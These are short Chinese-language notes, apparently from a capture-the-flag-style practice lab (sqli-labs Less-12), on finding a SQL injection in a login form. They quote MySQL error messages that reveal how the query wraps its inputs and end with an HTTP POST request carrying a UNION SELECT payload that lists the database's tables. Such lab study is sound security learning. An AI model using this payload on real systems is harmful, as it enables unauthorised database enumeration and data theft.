当请求为admin admin 的时候 就会回显
其它的时候就会回显失败
尝试sql 注入
发现不在有回显sql语句的包裹问题
sql报错的内容
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'adsmin") LIMIT 0,1' at line 1
判断注入的对象是括号
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '" ") and password=("adsmin") LIMIT 0,1' at line 1</br>
注入语句:
uname=adm"in" &passwd=adsmin&submit=Submit
请求
POST /Less-12/ HTTP/1.1
Host: sql.alienwares.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://sql.alienwares.top
Connection: close
Referer: https://sql.alienwares.top/Less-12/
Upgrade-Insecure-Requests: 1
uname=admn") union select group_concat(table_name),1 from information_schema.tables where table_schema=database()# &passwd=adsmin&submit=Submit